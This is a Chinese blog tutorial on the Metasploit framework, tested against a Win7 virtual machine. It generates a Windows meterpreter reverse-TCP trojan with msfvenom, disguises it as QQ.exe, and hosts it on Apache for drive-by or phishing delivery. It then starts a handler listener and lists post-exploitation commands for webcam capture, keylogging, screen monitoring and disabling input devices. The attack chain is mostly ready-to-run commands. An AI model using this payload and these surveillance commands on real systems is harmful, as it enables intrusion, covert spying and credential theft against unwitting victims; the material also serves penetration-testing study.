首页 > 编程语言 >Metasploit(1)

Metasploit(1)

时间:2023-05-31 15:46:51浏览次数:42  
标签:Metasploit 查看 数据库 tcp 连接 模块 监听

Metasploit是一个开源的渗透测试框架(平台),数据库为postgresql

渗透流程:信息收集->漏洞探测->漏洞利用->权限提升->后门植入->痕迹清除

systemctl status postgresql # 查看当前数据库状态
systemctl start postgresql # 开启数据库

Metasploit的模块

msfconsole # msf控制台
msfvenom # 木马生成平台

第一次运行时需要初始化数据库

第一种连接方式:
msfdb init # 初始化msf的数据库(自动开启数据库)
msfdb start # 开启数据库

msf的数据库文件位于/usr/share/metasploit-framework/config

db_connect -y cd /usr/share/metasploit-framework/config # msf数据库连接
db_disconnect -y cd /usr/share/metasploit-framework/config # 断开msf数据库连接
hosts # 列出数据库当中的主机列表
第二种连接方式:

手动打开msf平台

fig:

输入密码:

fig:

fig:

hosts查看

fig:

msfconsole中的模块

exploits # 渗透模块:利用已知的一些安全漏洞,对目标系统进行攻击,植入攻击载荷,从而获取目标系统的访问权限
auxiliart # 辅助模块:主要用于信息搜集阶段,功能包括扫描、口令猜解、敏感信息嗅探、FUZZ测试发掘漏洞、实施网络协议欺骗等
post # 后渗透模块:获取目标主机后shell后,继续信息收集,提权
payloads # 攻击载荷:在目标系统上打开控制会话的媒介
encoders # 编码模块:代码混淆,有一定的免杀功能
nops # 空指令模块:不会对程序运行状态造成任何实质影响的空操作或者无关操作指令,具有填充、延迟、等待、清除、破解的功能
evasion # 逃避模块(免杀模块):对攻击载荷进行免杀处理

msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.123.132 lport=7777 -f exe -o /var/www/html/QQ.exe
    -p # 指定攻击载荷 1/2/3
        1:平台(如Windows、Linux等)
        2:连接方式meterpreter(控制台,类似cmd等,工作模式为纯内存,容易隐藏)
        3:连接协议(reverse_tcp反向tcp连接)
    lhost # 监听ip(即攻击方的ip)
    lport # 监听端口(即攻击方的端口)
    -f # 要生成的文件类型
    o # 存放文件的位置,也可使用重定向符>

fig:

下放木马

把木马放置在/var/www/html 可以网页挂马,文件传输,社工钓鱼

需要开启apache服务

systemctl status apache2 # 查看apache状态
systemctl start apache2 # 开启apache
systemctl enable apache2 # 开机自启动apache

fig:

开启监听

使用监听模块(模块监听)

use exploit/multi/handler # 使用监听模块
show options # 查看当前模块选项

fig:

模块中开放的ip和port需要和木马一致

set payload windows/meterpreter/reverse_tcp # 设置payload为反向tcp连接
set lhost 192.168.123.132 # 设置监听ip
set lport 7777 # 设置监听端口
run # 运行

fig:

使用另一台虚拟机(win7)获取木马(开门,社区送温暖

fig:

运行

fig:

成功建立连接

fig:

持久化监听

建立连接

handler -H 192.168.123.132 -P 77777 -p windows/meterpreter/reverse_tcp

fig:

sessions # 查看已建立的会话
sessions 2 # 进入建立的会话
exit # 结束会话
bg #暂时挂起会话
sessions -k 2 # 杀死某个会话
sessions -K # 杀死全部会话

fig:

fig:

jobs # 查看进程
jobs -k 2 # 杀死某个进程
jobs -K # 杀死全部进程

fig:

meterpreter指令

建立连接后

getuid # 查看当前用户身份
getpid # 查看当前木马进程号
shell # 调用对方的shell
sysinfo # 获取系统信息
ps # 查看当前进程
run vnc # 实时监控
webcam_list # 查看摄像头列表
webcam_stream # 开启对方摄像头
webcam_snap # 拍照
uictl disable all(mouse/keyboard) # 禁用键鼠
uictl enable all(mouse/keyboard) # 启用键鼠
keyscan_start # 键盘扫描
keyscan_dump # 显示键盘扫描的记录
keyscan_stop # 停止键盘扫描
screenshot # 截图
screenshare # 网页版实时监控(vnc)

fig:

进入shell后如果出现乱码情况

chcp 65001 # 修改当前cmd编码格式为UTF-8编码

65001    UTF-8
936      简体中文(GB2312,也可以理解为 ANSI )
950      繁体中文BIG5
437      美国/加拿大英语
866      俄文
932      日文
949      韩文

标签:Metasploit,查看,数据库,tcp,连接,模块,监听
From: https://www.cnblogs.com/Iwakura-Lain/p/17446251.html

相关文章

  • metasploit经典漏洞复现
    1、MS14_064(OLE远程代码执行)漏洞MS14-064简介:MicrosoftWindowsOLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3-Win10+IE11全版本。找到并使用这个模块。 还需要给它......
  • kali Metasploit导入模块
    比如对于漏洞CyberLinkLabelPrint2.5-StackBufferOverflow(Metasploit)-WindowslocalExploit(exploit-db.com)首先从Exploit-DB下载45985.rb文件,该文件是ruby写的metasploit模块,用来复现攻击将模块复制到metasploit的渗透攻击模块目录cd/usr/share/metasploit-fr......
  • 网络安全工程师教你:Kali Linux之Metasploit渗透测试基础(四)
    本分享仅做学习交流,请自觉遵守法律法规!搜索:Kali与编程,学习更多网络攻防干货!下篇文章将在明天下午五点发布,敬请关注!Metasploit渗透测试框架基础(四)一、背景介绍Metasploit就是一个漏洞框架。它的全称叫做TheMetasploitFramework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不......
  • Metasploitable3打靶
    metasploitable3一、环境搭建介绍该靶场与2不同,可自定义镜像操作系统,由于版权等原因,该靶场最好使用virtualbox搭建,使用VMware搭建可能会有无法连接网络等问题。考虑需要培养线下无联网实战能力的原因,本次原则上只用kali里自带的工具,下次再推一些好用的工具。本靶机可能内......
  • Vulnhub之Loly靶机详细测试过程(不同提权方法,利用metasploit工具)
    Loly识别目标主机IP地址─(kali㉿kali)-[~/Desktop/Vulnhub/Loly]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:192.168.56.0/24|ScreenView:UniqueHosts......
  • Metasploit高级技术【第一章】
    预计更新第一章Metasploit的使用和配置1.1安装和配置Metasploit1.2Metasploit的基础命令和选项1.3高级选项和配置第二章渗透测试的漏洞利用和攻击方法1.1渗透测试中常见的漏洞类型和利用方法1.2Metasploit的漏洞利用模块和选项1.3模块编写和自定义第三章Metasploit的提权......
  • Metasploit入门到高级【第三章】
    来自公粽号:Kali与编程预计更新第一章:Metasploit简介Metasploit是什么Metasploit的历史和发展Metasploit的组成部分第二章:KaliLinux入门KaliLinux简介KaliLinux安......
  • Metasploit入门到高级【第四章】
    来自公粽号:Kali与编程预计更新第一章:Metasploit简介Metasploit是什么Metasploit的历史和发展Metasploit的组成部分第二章:KaliLinux入门KaliLinux简介KaliLinux安......
  • MetaSploit渗透测试魔鬼训练营之环境搭建
    网络环境拓扑虚拟环境下载链接虚拟机具体配置虚拟机类型IP域名区间网段Kali初始攻击点机192.168.48.128attacker.dvssc.comDMZ区OWASPBWA门户网......
  • metasploit2-practice-cnblog
    Metasploittable2打靶教程本次靶机练习主要熟悉:高危端口利用;metasploit中search,show及各个模块使用。一、环境准备1.把靶场放在vmware打开,启用nat模式:2.启用kali......